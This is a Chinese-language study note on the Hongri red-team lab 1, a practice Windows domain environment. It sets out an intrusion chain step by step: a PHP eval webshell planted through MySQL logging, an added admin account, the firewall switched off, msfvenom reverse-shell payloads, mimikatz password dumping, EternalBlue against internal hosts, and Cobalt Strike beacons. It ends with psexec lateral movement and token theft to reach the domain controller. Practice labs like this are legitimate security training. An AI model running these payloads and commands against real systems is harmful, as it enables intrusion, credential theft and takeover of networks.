紅日靶場一學習筆記

---

紅日靶場一

一：環境搭建

1、下載好鏡像文件。

2、直接vmware啟動即可。

這里我用自己的win10虛擬機作為攻擊機，設置為雙網卡NAT，vm2(192.168.234.131)

設置win7為雙網卡，vm1(192.168.52.143)，vm2(192.168.234.130)

設置win08單網卡vm1（192.168.52.138），win2k3為單網卡vm1（192.168.52.141）

這樣win10就可以訪問win7，但不能直接訪問win08和win2k3。

三台靶機的初始密碼都是hongrisec@2019 ，初次登錄需要改密碼。

進入win7，開啟web服務。

二：滲透過程：

信息收集

1、簡單地掃描下一win7端口

2、訪問80端口是一個phpstudy探針，掃描一下目錄，發現一個phpmyadmin目錄和beifen.rar文件。

phpmyadmin

直接root/root就可以進入。

直接寫馬不行，版本高，用mysql日志寫shell就行，絕對路徑在探針上有顯示。

 

set global general_log = "ON";

 

set global general_log_file = "C:/phpStudy/www/test.php";

 

SELECT '<?php eval($_POST["attack"]);?>'

4、使用antsword連接一下。

 

加用戶

 

net user 賬戶 密碼 /add
管理員權限，所有直接加
net localgroup administrators admin /add

 

關防火牆

netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

其它姿勢

參考：https://blog.csdn.net/qq_41821603/article/details/109948920

三：后滲透

關防火牆

netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

msf鏈接

antsword執行以下命令，msf上線一下

msfvenom -p windows/meterpreter_reverse_tcp LHOST=ip  LPORT=4444 -f exe -o shell.exe

use exploit/mutli/handler 
​
set payload windows/x64/meterpreter/reverse_tcp 
​
set lhost ip
​
set lport 4444
​
exploit -j(后台)允許

蟻劍上傳木馬，獲取sessions

查看信息

遷移進程

一般是explorer.exe

 

migrate pid

 

mimikatz抓密碼

load mimikatz 加載mimikatz 模塊，然后wdigest 查看明文密碼，成功獲取

 

關於msf cmd交互

execute -f cmd.exe -i -t

 

關於亂碼

用chcp 65001解決

 

開啟3389

run post/windows/manage/enable_rdp
rdesktop ip:3389

域環境

net config workstation  查看是否有域，以及當前登錄域
net view 查看域內主機列表
查看域控：
net group "domain controllers" /domain 查看域控制器(如果有多台)
net user /domain 查看域內所有域用戶 
net group "domain admins" /domain 查看域管理員列表

 

域名為 god
域中有三台主機：
stu1.god.org   
root-tvi862ubeh.god.org   
owa.god.org   為域控
域用戶有 : ligang , liukaifeng01 ,administrator
域管理員只有一個： administrator
其實直接就拿到域管理員了

 

四：橫向滲透

msf+proxychains

先進入sessions

run autoroute -s 192.168.52.0/24
或者
run post/multi/manage/autoroute
設置proxychains代理
use auxiliary/server/socks4a 
set srvport 1080
set srvhost 127.0.0.1
run

 

然后vim /etc/proxychains.conf 修改proxychains 配置為：

 

即可通過代理掃描，發現掃描不成功，

百度發現可以這樣，拿msf的直接代理掃。發現很慢，

 

前提：拿下邊界機之后，進入內網，想用nmap怎么辦？ CS可以開啟代理，但是是socks4的代理，只能使用tcp協議，所以nmap使用的時候要使用-sT選擇使用tcp協議，要使用-Pn不使用ICMP的ping確認主機存活

win2008

解決問題，直接掛代理掃

結果，發現445

 

掃描ms17-010

search ms17-010 
use auxiliary/scanner/smb/smb_ms17_010 
set rhost 10.37.129.7 
run

注意lhost是跳板機的ip

use exploit/windows/smb/ms17_010_eternalblue
​
set payload windows/x64/meterpreter/reverse_tcp
​
set lport 5555
​
set lhost 192.168.52.143
​
set rhosts 192.168.52.138
​
exploit 

 

 

 

win2003

另一台windows2003也開了445，發現只有

exploit/windows/smb/ms17_010_psexec

或者

auxiliary/admin/smb/ms17_010_command

一句話一句話的添加用戶

能用，這里用第二個

掃管道

use auxiliary/scanner/smb/pipe_auditor

 

use exploit/windows/smb/ms17_010_psexec

設置管道

set payload windows/meterpreter/bind_tcp

 

 

 

 

關於ipc$

https://blog.csdn.net/weixin_33969116/article/details/91833739?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-0.control&spm=1001.2101.3001.4242

https://blog.csdn.net/qq_41891666/article/details/107598979

空連接需要口令用戶名為空

https://zhuanlan.zhihu.com/p/43643596

最后需要用戶點擊

 

 

CS

webshell反彈shell給cs，cs創建Listener，payload選擇beacon http

然后攻擊 -> 生成后門 -> Windows Executable(S)，選擇剛創建的 Listener：

啟動

./cobaltstrike
​
./teamserver 192.168.85.128(ip,不能0.0.0.0 ,127.0.0.1) admin(密碼)

 

設置監聽

 

生成exe

 

 

目標主機信息收集

拿到 shell 第一步，調低心跳值，默認心跳為 60s，執行命令的響應很慢

我這是自己的內網且沒有殺軟我就設置為 0 了，真實環境不要設置這么低

進入 beacon 執行 sleep 0，然后查看下基本的本機信息：

whoami`、`hostname`、`net user`、`net localgroup administrators

眾所周知 systeminfo 可以查看系統詳細信息，我就不展示，提供兩個小 tips:

查看是什么操作系統 & 系統版本： 系統中文：systeminfo | findstr /B /C:"OS 名稱" /C:"OS 版本" 系統英文：systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 查詢系統體系架構：echo % PROCESSOR_ARCHITECTURE%

查詢已安裝的軟件及版本信息：wmic product get name,version

在 win10 中，輸入 wmic /? 會提示 wmic 已棄用，但在 server2012R2，win7 等版本中可以正常使用

powershell 中可替代該命令的是 Get-WmiObject:

Get-WmiObject -class win32_product | Select-Object -property name,version

查詢進程及服務： tasklist，默認顯示映像名稱，PID，會話名，會話，內存使用

默認顯示映像名稱，PID，服務

wmic process list brief

 

常見的殺軟進程：

進程名	軟件
360sd.exe	360 殺毒
360tray.exe	360 實時保護
ZhuDongFangYu.exe	360 主動防御
KSafeTray.exe	金山衛士
SafeDogUpdateCenter.exe	安全狗
McAfee	McShield.exe
egui.exe	NOD32
AVP.exe	卡巴斯基
avguard.exe	小紅傘
bdagent.exe	BitDefender

 

 

 

橫向探測

獲取到一個 cs 的 beacon 后可以目標內網情況和端口開放情況

在 beacon 上右鍵 -> 目標 -> 選擇 net view 或者 port scan:

執行后可以在 Targets 選項卡看到掃描出來的主機：

用 cs 的 hashdump 讀內存密碼：hashdump，用 mimikatz 讀注冊表密碼：logonpasswords

 

在憑證信息一欄可以清楚查看：

 

如果權限不夠可以提權，提權插件：ElevateKit

額外增加 ms14-058、ms15-051、ms16-016、uac-schtasks 四種提權方式

抓取密碼后可以先探測內網其他主機：

ping 方法：

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.72.%I | findstr "TTL="

最簡單的直接 arp -a 查看也可以，這里還推薦一個好用工具 Ladon

Ladon作者是 k8gege，它是一個大型內網滲透掃描器並且支持 cs 腳本形式

cs 要使用的話只需要下載其中的 Ladon.exe 和 Ladon.cna 即可運行基本功能

詳細功能參考官方 wiki或官方說明文檔

掃描網段內存活主機信息：Ladon 192.168.72.0/24 OsScan

Ladon` 還有很多使用功能，比如掃描 `MS17-010`：`Ladon 192.168.72.0/24 MS17010

其他的功能可以自己去嘗試

域探測差不多了還可以使用 BloodHound這款域滲透分析工具來分析攻擊路徑

BloodHound 介紹：

BloodHound 是一種單頁的 JavaScript 的 Web 應用程序，構建在 Linkurious 上，用 Electron 編譯，NEO4J 數據庫 PowerShell/C# ingestor.BloodHound 使用可視化圖來顯示 Active Directory 環境中隱藏的和相關聯的主機內容。攻擊者可以使用 BloodHound 輕松識別高度復雜的攻擊路徑，否則很難快速識別。防御者可以使用 BloodHound 來識別和防御那些相同的攻擊路徑。藍隊和紅隊都可以使用 BloodHound 輕松深入了解 Active Directory 環境中的權限關系。

 

橫向移動

這里有很多種方式，可以：

1. cs 上開通 socks 通道，在攻擊機上用 proxychains 將攻擊機的 msf 代入內網，但是 cs 的 socks 代理不穩定

2. ew 添加轉接隧道，在攻擊機上用 proxychains 將攻擊機的 msf 代入內網

3. cs 派生到 msf，msf 使用 socks4a 代理進內網，但是並不穩定

4. cs 派生到 msf，msf 使用使用 autoroute 添加路由進內網

5. 用 frp 創建 socks5 代理

 

 

SMB Beacon

另外這里還要介紹下 cs 派生 SMB Beacon

SMB Beacon 使用命名管道通過父級 Beacon 進行通訊，當兩個 Beacons 鏈接后，子 Beacon 從父 Beacon 獲取到任務並發送。因為鏈接的 Beacons 使用 Windows 命名管道進行通信，此流量封裝在 SMB 協議中，所以 SMB Beacon 相對隱蔽，繞防火牆時可能發揮奇效

簡單來說，SMB Beacon 有兩種方式

第一種直接派生一個孩子，目的為了進一步盜取內網主機的 hash

新建一個 Listener，payload 設置為 Beacon SMB：

我用的是 4.0 版本，之前的 3.14 版本和這個可能會有微小差異

在已有的 Beacon上右鍵 Spawn(生成會話 / 派生)，選擇創建的 smb beacon 的 listerner:

 

選擇后會反彈一個子會話，在 external 的 ip 后面會有一個鏈接的小圖標：

這就是派生的 SMB Beacon，當前沒有連接

可以在主 Beacon 上用 link host 連接它，或者 unlink host 斷開它

 

第二種在已有的 beacon 上創建監聽，用來作為跳板進行內網穿透

前提是能夠通過 shell 之類訪問到內網其他主機

 

psexec 使用憑證登錄其他主機

前面橫向探測已經獲取到內網內的其他 Targets 以及讀取到的憑證信息

於是可以嘗試使用 psexec 模塊登錄其他主機

右鍵選擇一台非域控主機 ROOT-TVI862UBEH 的 psexec 模塊：

在彈出的窗口中選擇使用 god.org 的 Administrator 的憑證信息

監聽器選擇剛才創建的 smb beacon，會話也選擇對應的 smb beacon 的會話：

 

執行后效果如下：

可以看到分別執行了

rev2self
make_token GOD.ORG\Administrator hongrisec@2020
jump psexec ROOT-TVI862UBEH smb

這幾條命令，執行后得到了 ROOT-TVI862UBEH 這台主機的 beacon

如法炮制得到了域控主機 OWA 的 beacon:

最終的圖標視圖如圖所示：

 

token 竊取

除了直接使用獲取到的 hash 值，也可以直接竊取 GOD\Administrator 的 token 來登錄其他主機

選擇 beacon 右鍵 -> 目標 -> 進程列表

選擇 GOD\Administrator 的 token 盜取：

然后在選擇令牌處勾選使用當前 token 即可：

效果和前面是一樣的

 

 

參考鏈接：

https://www.cnblogs.com/wh4am1/p/7204462.html

https://blog.csdn.net/qq_41891666/article/details/107598979?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-4.control&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-4.control

https://blog.csdn.net/qq_41821603/article/details/109948920

https://blog.csdn.net/qq_40989258/article/details/110168816

https://soapffz.com/sec/558.html

https://www.icode9.com/content-4-914703.html

http://cn-sec.com/archives/261642.html